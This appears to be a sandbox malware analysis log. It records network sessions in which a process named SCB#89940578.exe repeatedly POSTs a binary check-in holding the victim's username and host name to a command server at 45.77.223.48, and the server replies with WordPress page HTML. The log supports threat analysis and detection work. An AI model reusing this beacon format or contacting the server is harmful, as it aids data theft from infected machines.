Apr 26, 2024 04:43:18.729846954 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:18.729882956 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:18.730154037 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:18.730200052 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:18.730319977 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:18.730452061 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49793	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:19.056807995 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:19.245510101 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:20.159336090 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:19 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:20.159399986 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:20.167474031 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:20.167912960 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:20.168005943 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:20.168045044 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:20.168190956 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:20.168232918 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:20.168271065 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:20.168311119 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49794	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:20.496254921 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:20.684895039 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:21.587587118 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:20 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:21.587707043 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:21.587744951 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:21.595545053 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:21.595608950 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:21.595786095 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:21.595873117 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:21.596366882 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:21.596410036 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:21.596520901 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49795	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:21.940706968 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:22.138323069 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:23.038809061 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:22 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:23.038935900 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:23.038957119 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:23.048779011 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:23.049536943 CEST	166	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:23.049578905 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 26, 2024 04:43:23.049700022 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 26, 2024 04:43:23.049736977 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 26, 2024 04:43:23.049854040 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia
Apr 26, 2024 04:43:23.051150084 CEST	1289	IN	Data Raw: 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 61 6e 63 Data Ascii: -block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}.wp-block-social-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49796	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:23.393349886 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:23.581679106 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:24.530702114 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:23 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:24.530751944 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:24.542562962 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:24.543848991 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:24.545156956 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:24.545358896 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:24.545444965 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:24.545509100 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:24.545547962 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
